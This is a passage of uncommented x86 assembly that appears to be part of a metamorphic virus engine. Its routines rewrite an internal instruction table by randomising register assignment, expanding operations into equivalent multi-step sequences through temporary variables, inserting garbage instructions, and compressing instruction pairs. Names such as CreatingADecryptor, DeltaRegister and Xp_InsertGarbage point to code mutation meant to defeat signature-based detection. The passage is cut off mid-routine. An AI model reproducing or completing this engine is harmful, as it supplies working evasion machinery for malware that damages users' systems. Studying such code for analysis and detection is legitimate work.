jmp @@Triple_Next_SetInstruction
@@Triple_Next04:
mov eax, [edx]
cmp al, 44h+80h
jnz @@Triple__Next04
mov eax, [edi]
cmp al, 42h+80h
jz @@Triple_Next04_Constr00
cmp al, 70h
jb @@Triple__Next04
cmp al, 7Fh
ja @@Triple__Next04
mov eax, [esi]
sub al, 80h
jmp @@Triple_Next03_Check_CMP_TEST
@@Triple_Next04_Constr00:
mov eax, [esi]
cmp al, 00h+80h
jb @@Triple__Next04
cmp al, 4Ch+80h
jbe @@Triple_Next03_Common
@@Triple__Next04:
@@Triple_End:
jmp @@EndNoCompressed
@@EndCompressed:
mov eax, 1
pop edi
ret
@@EndNoCompressed:
xor eax, eax
pop edi
ret
ShrinkThisInstructions endp
OrderRegs proc
push edx
mov eax, [edi+1]
and eax, 0FFh
cmp eax, 8
jnz @@_Next
mov eax, [edi+2]
and eax, 0FFh
cmp eax, 7
ja @@_End
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+1], eax
mov eax, [edi+2]
and eax, 0FFFFFF00h
add eax, 8
mov [edi+2], eax
@@_End: pop edx
ret
@@_Next: mov eax, [edi+2]
mov edx, [edi+1]
and eax, 0FFh
and edx, 0FFh
cmp eax, edx
ja @@_End
push eax
mov edx, [edi+2]
mov eax, [edi+1]
and eax, 0FFh
and edx, 0FFFFFF00h
add eax, edx
mov [edi+2], eax
pop eax
mov edx, [edi+1]
and edx, 0FFFFFF00h
add eax, edx
mov [edi+1], eax
pop edx
ret
OrderRegs endp
CalculateOperation proc
and ebx, 0FFh
and eax, 0FFh
cmp ebx, 40h
jz @@Eliminate1st
cmp eax, 40h
jz @@MOV
or eax, eax
jz @@ADD
cmp eax, 8
jz @@OR
cmp eax, 20h
jz @@AND
cmp eax, 28h
jz @@SUB
cmp eax, 30h
jz @@XOR
cmp eax, 38h
jz @@Eliminate1st
cmp eax, 48h
jnz @@Eliminate1st
jmp @@NoCompression
@@ADD: or ebx, ebx
jz @@ADD_ADD
cmp ebx, 28h
jz @@ADD_SUB
jmp @@NoCompression
@@OR: cmp ebx, 8
jz @@OR_OR
jmp @@NoCompression
@@AND: cmp ebx, 20h
jz @@AND_AND
jmp @@NoCompression
@@SUB: or ebx, ebx
jz @@SUB_ADD
cmp ebx, 28h
jnz @@NoCompression
@@SUB_SUB: neg ecx
sub ecx, edx
xor eax, eax
ret
@@SUB_ADD: sub edx, ecx
mov ecx, edx
xor eax, eax
ret
@@XOR: cmp ebx, 30h
jz @@XOR_XOR
jmp @@NoCompression
@@MOV: or ebx, ebx
jz @@MOV_ADD
cmp ebx, 8
jz @@MOV_OR
cmp ebx, 20h
jz @@MOV_AND
cmp ebx, 28h
jz @@MOV_SUB
cmp ebx, 30h
jz @@MOV_XOR
@@NoCompression:
mov eax, 0FEh
ret
@@Eliminate1st:
mov eax, 0FFh
ret
@@ADD_ADD:
@@MOV_ADD: add ecx, edx
ret
@@OR_OR:
@@MOV_OR: or ecx, edx
ret
@@AND_AND:
@@MOV_AND: and ecx, edx
ret
@@ADD_SUB:
@@MOV_SUB: sub ecx, edx
ret
@@XOR_XOR:
@@MOV_XOR: xor ecx, edx
ret
CalculateOperation endp
GetRealCheck proc
cmp eax, ebx
jb @@1
mov ecx, ebx
mov edx, eax
jmp @@2
@@1: mov ecx, eax
mov edx, ebx
@@2: test ecx, 1 ; ECX <= EDX
jnz @@NoUnconditional
sub edx, 1
cmp ecx, edx
jz @@UnconditionalJump
add edx, 1
@@NoUnconditional:
cmp ecx, edx
jz @@ReturnCurrent
cmp ecx, 2
jz @@Check2_x
cmp ecx, 3
jz @@Check3_x
cmp ecx, 4
jz @@Check4_x
cmp ecx, 5
jnz @@NoOption
@@Check5_x:
cmp edx, 7
jz @@SetNE
cmp edx, 6
jz @@UnconditionalJump
jmp @@NoOption
@@Check2_x:
cmp edx, 4
jb @@NoOption
cmp edx, 7
ja @@NoOption
test edx, 1
jnz @@SetNE
jmp @@SetBE
@@Check3_x:
cmp edx, 4
jz @@SetNB
cmp edx, 7
jz @@SetNB
cmp edx, 6
jz @@UnconditionalJump
jmp @@NoOption
@@Check4_x:
cmp edx, 6
jz @@SetBE
cmp edx, 7
jnz @@NoOption
@@SetNB: mov eax, 3
ret
@@SetNE: mov eax, 5
ret
@@SetBE: mov eax, 6
ret
@@NoOption:
mov eax, 0FFh
@@ReturnCurrent:
ret
@@UnconditionalJump:
mov eax, 79h
ret
GetRealCheck endp
CheckIfInstructionUsesMem proc
cmp eax, 4Eh
jbe @@Common
cmp eax, 4Fh
jz @@UsesMem
cmp eax, 70h
jb @@CheckLastBit
cmp eax, 80h
jb @@NoMem
cmp eax, 0CEh
jbe @@Common
cmp eax, 0E7h
jbe @@CheckLastBit
cmp eax, 0EAh
jz @@UsesMem
cmp eax, 0EBh
jz @@UsesMem
cmp eax, 0F1h
jz @@UsesMem
cmp eax, 0F3h
jz @@UsesMem
cmp eax, 0F6h
jz @@UsesMem
cmp eax, 0F7h
jz @@UsesMem
cmp eax, 0F8h
jz @@UsesMem
cmp eax, 0FCh
jz @@UsesMem
@@NoMem: xor eax, eax
ret
@@CheckLastBit:
and eax, 1
ret
@@Common:
cmp eax, 4Eh
jz @@UsesMem
and eax, 7
cmp eax, 2
jb @@NoMem
cmp eax, 4
ja @@NoMem
@@UsesMem:
mov eax, 1
ret
CheckIfInstructionUsesMem endp
;----------------------------------------------------------------------------------
XpandCode proc
mov esi, [ebp+InstructionTable]
mov edi, [ebp+ExpansionResult]
mov eax, [ebp+SizeOfExpansion]
mov [ebp+Xp_RecurseLevel], eax
mov eax, [ebp+CreatingADecryptor]
or eax, eax
jnz @@KeepRegisterTranslation
mov eax, 8
mov [ebp+Xp_Register0], eax
mov [ebp+Xp_Register1], eax
mov [ebp+Xp_Register2], eax
mov [ebp+Xp_Register3], eax
mov [ebp+Xp_Register5], eax
mov [ebp+Xp_Register6], eax
mov [ebp+Xp_Register7], eax
mov eax, 4
mov [ebp+Xp_Register4], eax
@@Other8BitsReg:
call Random
and eax, 7
cmp eax, 3
ja @@Other8BitsReg
mov ebx, [ebp+Register8Bits]
call Xpand_SetRegister4Xlation
@@OtherDeltaReg:
call Random
and eax, 7
cmp eax, 2
jbe @@OtherDeltaReg
cmp eax, 4
jz @@OtherDeltaReg
mov ebx, [ebp+DeltaRegister]
call Xpand_SetRegister4Xlation
or eax, eax
jz @@OtherDeltaReg
mov ebx, -1
@@NextRegister:
add ebx, 1
cmp ebx, [ebp+DeltaRegister]
jz @@NextRegister
cmp ebx, [ebp+Register8Bits]
jz @@NextRegister
cmp ebx, 4
jz @@NextRegister
cmp ebx, 8
jz @@EndOfRegisters
@@OtherRegister:
call Random
and eax, 7
cmp eax, 4
jz @@OtherRegister
call Xpand_SetRegister4Xlation
or eax, eax
jz @@OtherRegister
jmp @@NextRegister
@@EndOfRegisters:
mov eax, [ebp+DeltaRegister]
call Xpand_TranslateRegister
mov [ebp+TranslatedDeltaRegister], eax
@@KeepRegisterTranslation:
@@Expand:
call XpandThisInstruction
add esi, 10h
cmp esi, [ebp+AddressOfLastInstruction]
jnz @@Expand
mov [ebp+AddressOfLastInstruction], edi
call Xpand_UpdateLabels
ret
XpandCode endp
Xpand_TranslateRegister proc
or eax, eax
jz @@Get0
cmp eax, 1
jz @@Get1
cmp eax, 2
jz @@Get2
cmp eax, 3
jz @@Get3
cmp eax, 4
jz @@Return
cmp eax, 5
jz @@Get5
cmp eax, 6
jz @@Get6
cmp eax, 7
jz @@Get7
mov eax, 8
ret
@@Get7: mov eax, [ebp+Xp_Register7]
ret
@@Get0: mov eax, [ebp+Xp_Register0]
ret
@@Get1: mov eax, [ebp+Xp_Register1]
ret
@@Get2: mov eax, [ebp+Xp_Register2]
ret
@@Get3: mov eax, [ebp+Xp_Register3]
ret
@@Get5: mov eax, [ebp+Xp_Register5]
ret
@@Get6: mov eax, [ebp+Xp_Register6]
@@Return: ret
Xpand_TranslateRegister endp
Xpand_ReverseTranslation proc
cmp eax, 4
jz @@Return
cmp eax, [ebp+Xp_Register0]
jz @@Return0
cmp eax, [ebp+Xp_Register1]
jz @@Return1
cmp eax, [ebp+Xp_Register2]
jz @@Return2
cmp eax, [ebp+Xp_Register3]
jz @@Return3
cmp eax, [ebp+Xp_Register5]
jz @@Return5
cmp eax, [ebp+Xp_Register6]
jz @@Return6
cmp eax, [ebp+Xp_Register7]
jz @@Return7
mov eax, 8
@@Return: ret
@@Return0: xor eax, eax
ret
@@Return1: mov eax, 1
ret
@@Return2: mov eax, 2
ret
@@Return3: mov eax, 3
ret
@@Return5: mov eax, 5
ret
@@Return6: mov eax, 6
ret
@@Return7: mov eax, 7
ret
Xpand_ReverseTranslation endp
Xpand_SetRegister4Xlation proc
cmp eax, [ebp+Xp_Register0]
jz @@ReturnError
cmp eax, [ebp+Xp_Register1]
jz @@ReturnError
cmp eax, [ebp+Xp_Register2]
jz @@ReturnError
cmp eax, [ebp+Xp_Register3]
jz @@ReturnError
cmp eax, [ebp+Xp_Register5]
jz @@ReturnError
cmp eax, [ebp+Xp_Register6]
jz @@ReturnError
cmp eax, [ebp+Xp_Register7]
jz @@ReturnError
or ebx, ebx
jz @@SetAt0
cmp ebx, 1
jz @@SetAt1
cmp ebx, 2
jz @@SetAt2
cmp ebx, 3
jz @@SetAt3
cmp ebx, 5
jz @@SetAt5
cmp ebx, 6
jz @@SetAt6
@@SetAt7: mov [ebp+Xp_Register7], eax
jmp @@ReturnNoError
@@SetAt0: mov [ebp+Xp_Register0], eax
jmp @@ReturnNoError
@@SetAt1: mov [ebp+Xp_Register1], eax
jmp @@ReturnNoError
@@SetAt2: mov [ebp+Xp_Register2], eax
jmp @@ReturnNoError
@@SetAt3: mov [ebp+Xp_Register3], eax
jmp @@ReturnNoError
@@SetAt5: mov [ebp+Xp_Register5], eax
jmp @@ReturnNoError
@@SetAt6: mov [ebp+Xp_Register6], eax
jmp @@ReturnNoError
@@ReturnError:
xor eax, eax
ret
@@ReturnNoError:
mov eax, 1
ret
Xpand_SetRegister4Xlation endp
XpandThisInstruction proc
mov eax, [esi+0Bh]
mov [edi+0Bh], eax
mov [edi+0Ch], esi
mov [esi+0Ch], edi
xor eax, eax
mov al, [esi]
cmp eax, 4Ch
ja @@Xpand_Next001
xor eax, eax
@@Generic: mov [ebp+Xp_8Bits], eax
mov eax, [esi]
and eax, 78h
mov [ebp+Xp_Operation], eax
mov eax, [esi]
and eax, 7
or eax, eax
jz @@OPRegImm
cmp eax, 1
jz @@OPRegReg
cmp eax, 2
jz @@OPRegMem
cmp eax, 3
jz @@OPMemReg
@@OPMemImm:
mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@OPMemImm32
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 7Fh
jbe @@OPMemImmSet
or eax, 0FFFFFF00h
jmp @@OPMemImmSet
@@OPMemImm32:
mov eax, [esi+7]
@@OPMemImmSet:
mov [ebp+Xp_Immediate], eax
call Xpand_SetMemoryAddress
call Xp_GenOPMemImm
jmp @@Ret
@@OPRegImm:
mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@OPRegImm32
mov eax, [esi+7]
and eax, 0FFh
cmp eax, 7Fh
jbe @@OPRegImmSet
or eax, 0FFFFFF00h
jmp @@OPRegImmSet
@@OPRegImm32:
mov eax, [esi+7]
@@OPRegImmSet:
mov [ebp+Xp_Immediate], eax
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenOPRegImm
jmp @@Ret
@@OPRegReg:
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_SrcRegister], eax
mov eax, [esi+7]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenOPRegReg
jmp @@Ret
@@OPRegMem:
call Xpand_SetMemoryAddress
mov eax, [esi+7]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenOPRegMem
jmp @@Ret
@@OPMemReg:
call Xpand_SetMemoryAddress
mov eax, [esi+7]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenOPMemReg
jmp @@Ret
@@Xpand_Next001:
cmp eax, 00h+80h
jb @@Xpand_Next002
cmp eax, 4Ch+80h
ja @@Xpand_Next002
mov eax, 80h
jmp @@Generic
@@Xpand_Next002:
cmp eax, 50h
jnz @@Xpand_Next003
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
jmp @@Ret
@@Xpand_Next003:
cmp eax, 51h
jnz @@Xpand_Next004
call Xpand_SetMemoryAddress
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenPUSHMem
jmp @@Ret
@@Xpand_Next004:
cmp eax, 58h
jnz @@Xpand_Next005
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
jmp @@Ret
@@Xpand_Next005:
cmp eax, 59h
jnz @@Xpand_Next006
call Xpand_SetMemoryAddress
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenPOPMem
jmp @@Ret
@@Xpand_Next006:
cmp eax, 68h
jnz @@Xpand_Next007
mov eax, [esi+7]
mov [ebp+Xp_Immediate], eax
call Xp_GenPUSHImm
jmp @@Ret
@@Xpand_Next007:
cmp eax, 70h
jb @@Xpand_Next008
cmp eax, 7Fh
ja @@Xpand_Next008
mov [ebp+Xp_Operation], eax
mov eax, [esi+1]
mov [ebp+Xp_Immediate], eax
call Xp_GenJcc
jmp @@Ret
@@Xpand_Next008:
cmp eax, 0E0h
jnz @@Xpand_Next009
call Xpand_SetRegister
call Xp_GenNOTReg
jmp @@Ret
@@Xpand_Next009:
cmp eax, 0E1h
jnz @@Xpand_Next010
call Xpand_SetMemoryAddress
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenNOTMem
jmp @@Ret
@@Xpand_Next010:
cmp eax, 0E2h
jnz @@Xpand_Next011
call Xpand_Set8BitsRegister
call Xp_GenNOTReg
jmp @@Ret
@@Xpand_Next011:
cmp eax, 0E3h
jnz @@Xpand_Next012
call Xpand_SetMemoryAddress
mov eax, 80h
mov [ebp+Xp_8Bits], eax
call Xp_GenNOTMem
jmp @@Ret
@@Xpand_Next012:
cmp eax, 0E4h
jnz @@Xpand_Next013
call Xpand_SetRegister
call Xp_GenNEGReg
jmp @@Ret
@@Xpand_Next013:
cmp eax, 0E5h
jnz @@Xpand_Next014
call Xpand_SetMemoryAddress
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenNEGMem
jmp @@Ret
@@Xpand_Next014:
cmp eax, 0E6h
jnz @@Xpand_Next015
call Xpand_Set8BitsRegister
call Xp_GenNEGReg
jmp @@Ret
@@Xpand_Next015:
cmp eax, 0E7h
jnz @@Xpand_Next016
call Xpand_SetMemoryAddress
mov eax, 80h
mov [ebp+Xp_8Bits], eax
call Xp_GenNEGMem
jmp @@Ret
@@Xpand_Next016:
cmp eax, 0E8h
jnz @@Xpand_Next017
@@CopyInstruction:
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
mov eax, [esi+7]
mov [edi+7], eax
add edi, 10h
jmp @@Ret
@@Xpand_Next017:
cmp eax, 0E9h
jnz @@Xpand_Next018
mov eax, [esi+1]
mov [ebp+Xp_Immediate], eax
call Xp_GenJMP
jmp @@Ret
@@Xpand_Next018:
cmp eax, 0EAh
jnz @@Xpand_Next019
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xpand_SetMemoryAddress
call Xp_GenCALLMem
jmp @@Ret
@@Xpand_Next019:
cmp eax, 0EBh
jnz @@Xpand_Next020
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xpand_SetMemoryAddress
call Xp_GenJMPMem
jmp @@Ret
@@Xpand_Next020:
cmp eax, 0ECh
jnz @@Xpand_Next021
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xpand_SetRegister
call Xp_GenCALLReg
jmp @@Ret
@@Xpand_Next021:
cmp eax, 0EDh
jnz @@Xpand_Next022
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xpand_SetRegister
call Xp_GenJMPReg
jmp @@Ret
@@Xpand_Next022:
cmp eax, 0F0h
jnz @@Xpand_Next023
@@Xpand_TranslateReg:
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [esi+1], eax
jmp @@CopyInstruction
@@Xpand_Next023:
cmp eax, 0F2h
jz @@Xpand_TranslateReg
@@Xpand_Next024:
cmp eax, 0F1h
jnz @@Xpand_Next025
@@Xpand_TranslateMem:
call Xpand_SetMemoryAddress
mov eax, [esi]
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [esi+7]
mov [edi+7], eax
add edi, 10h
jmp @@Ret
@@Xpand_Next025:
cmp eax, 0F3h
jz @@Xpand_TranslateMem
@@Xpand_Next026:
cmp eax, 0F4h
jnz @@Xpand_Next027
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
mov eax, 1
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
mov eax, 2
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
jmp @@Ret
@@Xpand_Next027:
cmp eax, 0F5h
jnz @@Xpand_Next028
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov eax, 2
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
mov eax, 1
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
xor eax, eax
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
jmp @@Ret
@@Xpand_Next028:
cmp eax, 0F6h
jnz @@Xpand_Next029_
xor eax, eax
mov [ebp+Xp_Register], eax
call Xpand_SetMemoryAddress
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPMemReg
jmp @@Ret
@@Xpand_Next029_:
cmp eax, 0F8h
jnz @@Xpand_Next029
mov eax, [esi+7]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
call Xpand_SetMemoryAddress
call Xp_GenMOVZX
jmp @@Ret
@@Xpand_Next029:
cmp eax, 0FCh
jnz @@Xpand_Next030
call Xpand_SetMemoryAddress
mov eax, [esi+7]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenLEA
jmp @@Ret
@@Xpand_Next030:
cmp eax, 0FEh
jnz @@Xpand_Next031
call Xp_GenRET
jmp @@Ret
@@Xpand_Next031:
cmp eax, 0FFh
jz @@Return
@@Xpand_Next032:
cmp eax, 0F7h
jnz @@Xpand_Next033
call Xpand_SetMemoryAddress
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov eax, [esi+7]
and eax, 0FFh
mov [ebp+Xp_Immediate], eax
mov eax, [esi+8]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
mov eax, [esi+9]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_SrcRegister], eax
call Xp_MakeSET_WEIGHT
@@Xpand_Next033:
@@Ret: call Random
and eax, 02h
or eax, eax
jnz @@Return
mov eax, [esi]
and eax, 78h
cmp eax, 38h
jz @@OnlyNOP
cmp eax, 48h
jz @@OnlyNOP
cmp eax, 0EAh
jz @@OnlyNOP
cmp eax, 0F6h
jz @@OnlyNOP
call Xp_InsertGarbage
@@Return: ret
@@OnlyNOP: mov eax, 90FDh
mov [edi], eax
xor eax, eax
mov [edi+0Bh], eax
mov [edi+0Ch], esi
add edi, 10h
ret
XpandThisInstruction endp
Xpand_SetMemoryAddress proc
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 9
jnz @@Next_NoIdent
mov eax, [esi+3]
mov eax, [eax]
add eax, [ebp+New_DATA_SECTION]
mov [ebp+Xp_Mem_Addition], eax
mov eax, [ebp+DeltaRegister]
call Xpand_TranslateRegister
mov [ebp+Xp_Mem_Index1], eax
mov eax, 8
mov [ebp+Xp_Mem_Index2], eax
ret
@@Next_NoIdent:
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 8
jae @@Next_Index
call Xpand_TranslateRegister
@@Next_Index:
mov [ebp+Xp_Mem_Index1], eax
mov eax, [esi+2]
mov ecx, eax
and ecx, 0C0h
and eax, 3Fh
cmp eax, 8
jae @@Next_Index2
push ecx
call Xpand_TranslateRegister
pop ecx
or eax, ecx
@@Next_Index2:
mov [ebp+Xp_Mem_Index2], eax
mov eax, [esi+3]
mov [ebp+Xp_Mem_Addition], eax
call Random
and eax, 1
jz @@Return
or ecx, ecx
jnz @@Return
mov eax, [ebp+Xp_Mem_Index1]
mov ecx, [ebp+Xp_Mem_Index2]
mov [ebp+Xp_Mem_Index1], ecx
mov [ebp+Xp_Mem_Index2], eax
@@Return: ret
Xpand_SetMemoryAddress endp
Xpand_UpdateLabels proc
mov ebx, [ebp+LabelTable]
mov ecx, [ebp+NumberOfLabels]
@@LoopLabel: mov eax, [ebx]
mov eax, [eax+0Ch]
mov [ebx+4], eax
add ebx, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopLabel
ret
Xpand_UpdateLabels endp
Xpand_Set8BitsRegister proc
mov eax, 80h
jmp Xpand_SetRegister_Common
Xpand_Set8BitsRegister endp
Xpand_SetRegister proc
xor eax, eax
Xpand_SetRegister_Common:
mov [ebp+Xp_8Bits], eax
mov eax, [esi+1]
and eax, 0FFh
call Xpand_TranslateRegister
mov [ebp+Xp_Register], eax
ret
Xpand_SetRegister endp
Xp_GenLEA proc
call Xp_SaveOperation
mov eax, [ebp+Xp_Mem_Index1]
cmp eax, [ebp+Xp_Register]
jz @@Addition1
mov eax, [ebp+Xp_Mem_Index2]
cmp eax, [ebp+Xp_Register]
jz @@Addition2
mov eax, 40h
mov [ebp+Xp_Operation], eax
@@MOV_Other:
call Random
and eax, 3
or eax, eax
jz @@MOV_Other
cmp eax, 1
jz @@MOV_FirstIndex1
cmp eax, 2
jz @@MOV_FirstIndex2
@@MOV_FirstAddition:
mov eax, [ebp+Xp_Mem_Addition]
or eax, eax
jz @@MOV_Finished2
mov [ebp+Xp_Immediate], eax
call Xp_GenOPRegImm
xor eax, eax
mov [ebp+Xp_Mem_Addition], eax
jmp @@MOV_Finished
@@MOV_FirstIndex1:
mov eax, [ebp+Xp_Mem_Index1]
cmp eax, 8
jz @@MOV_Finished2
mov [ebp+Xp_SrcRegister], eax
call Xp_GenOPRegReg
mov eax, 8
mov [ebp+Xp_Mem_Index1], eax
jmp @@MOV_Finished
@@MOV_FirstIndex2:
mov eax, [ebp+Xp_Mem_Index2]
cmp eax, 8
jz @@MOV_Finished2
cmp eax, 8
jb @@MOV_FirstIndex2_Set
sub eax, 40h
@@MOV_FirstIndex2_Set:
mov [ebp+Xp_SrcRegister], eax
call Xp_GenOPRegReg
mov eax, [ebp+Xp_Mem_Index2]
cmp eax, 7
jbe @@MOV_FirstIndex2_Set8
sub eax, 40h
mov [ebp+Xp_Mem_Index2], eax
jmp @@MOV_Finished
@@MOV_FirstIndex2_Set8:
mov eax, 8
mov [ebp+Xp_Mem_Index2], eax
@@MOV_Finished:
xor eax, eax
mov [ebp+Xp_Operation], eax
@@MOV_Finished2:
mov eax, [ebp+Xp_Mem_Index1]
cmp eax, 8
jnz @@MOV_Other
mov eax, [ebp+Xp_Mem_Index2]
cmp eax, 8
jnz @@MOV_Other
mov eax, [ebp+Xp_Mem_Addition]
or eax, eax
jnz @@MOV_Other
call Xp_RestoreOperation
ret
@@Addition1: mov eax, 8
mov [ebp+Xp_Mem_Index1], eax
jmp @@MOV_Finished
@@Addition2: mov eax, 8
mov [ebp+Xp_Mem_Index2], eax
jmp @@MOV_Finished
Xp_GenLEA endp
Xp_GenOPRegReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
call Random
and eax, 3
or eax, eax
jnz @@Double
@@Triple: mov eax, [ebp+Xp_Operation]
cmp eax, 38h
jae @@Double
call Xp_SaveOperation
call Xp_GetTempVar
mov eax, [ebp+Xp_Operation]
push eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemReg
pop eax
mov [ebp+Xp_Operation], eax
mov eax, [ebp+Xp_Register]
push eax
mov eax, [ebp+Xp_SrcRegister]
mov [ebp+Xp_Register], eax
call Xp_GenOPMemReg
pop eax
mov [ebp+Xp_Register], eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double: mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Double_MOV
cmp eax, 38h
jz @@Double_CMP
cmp eax, 48h
jz @@Double_TEST
@@Double_OP: call Xp_SaveOperation
call Xp_GetTempVar
mov eax, [ebp+Xp_Operation]
push eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
mov eax, [ebp+Xp_Register]
push eax
mov eax, [ebp+Xp_SrcRegister]
mov [ebp+Xp_Register], eax
call Xp_GenOPMemReg
pop eax
mov [ebp+Xp_Register], eax
pop eax
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double_MOV:
call Random
and eax, 1
jz @@Double_OP
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Double_OP
mov eax, [ebp+Xp_Register]
push eax
mov eax, [ebp+Xp_SrcRegister]
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
pop eax
mov [ebp+Xp_Register], eax
call Xp_GenPOPReg
jmp Xp_DecreaseRecurseLevel
@@Double_CMP:
mov ecx, 3Bh
mov edx, 2Bh
@@Double_CMPTEST_Common:
call Random
and eax, 1
jz @@Double_OP
call Xp_SaveOperation
push ecx
push edx
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemReg
pop edx
pop ecx
call Random
and eax, 1
jz @@Double_CMPTEST_Next
mov edx, ecx
@@Double_CMPTEST_Next:
add edx, [ebp+Xp_8Bits]
mov [edi], edx
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_SrcRegister]
mov [edi+7], eax
add edi, 10h
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double_TEST:
mov ecx, 23h
mov edx, 4Bh
jmp @@Double_CMPTEST_Common
@@Single: mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Single_MOV
or eax, eax
jz @@Single_ADD
@@Single_OP: mov eax, [ebp+Xp_Operation]
add eax, 1
add eax, [ebp+Xp_8Bits]
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
mov eax, [ebp+Xp_SrcRegister]
mov [edi+1], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_MOV:
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single_OP
call Random
and eax, 1
jz @@Single_OP
mov eax, 0FCh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
mov eax, [ebp+Xp_SrcRegister]
mov [edi+1], eax
mov eax, 8
mov [edi+2], eax
xor eax, eax
mov [edi+3], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_ADD:
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single_OP
call Random
and eax, 1
jz @@Single_OP
mov eax, 0FCh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
mov [edi+7], eax
mov eax, [ebp+Xp_SrcRegister]
mov [edi+2], eax
xor eax, eax
mov [edi+3], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenOPRegReg endp
Xp_GenOPRegImm proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
call Random
and eax, 3
or eax, eax
jnz @@Double
@@Triple: mov eax, [ebp+Xp_Operation]
cmp eax, 38h
jz @@Double
cmp eax, 48h
jz @@Double
cmp eax, 40h
jz @@Double
call Xp_SaveOperation
call Xp_GetTempVar
mov eax, [ebp+Xp_Operation]
push eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Random
and eax, 1
jz @@Triple_1
call Xp_GenOPMemReg
pop eax
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemImm
@@Triple_Common:
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Triple_1: call Xp_GenOPMemImm
pop eax
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemReg
jmp @@Triple_Common
@@Double: mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Double_MOV
cmp eax, 38h
jz @@Double_CMP
cmp eax, 48h
jz @@Double_TEST
@@Double_OP: call Random
and eax, 1
jz @@Double_OP_Composed
@@Double_OP_Normal:
call Xp_SaveOperation
call Xp_GetTempVar
mov eax, [ebp+Xp_Operation]
push eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemImm
pop eax
mov [ebp+Xp_Operation], eax
cmp eax, 38h
jz @@Double_OP_Normal_Direct
cmp eax, 48h
jz @@Double_OP_Normal_Direct
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double_OP_Normal_Direct:
add eax, 2
add eax, [ebp+Xp_8Bits]
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
add edi, 10h
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double_OP_Composed:
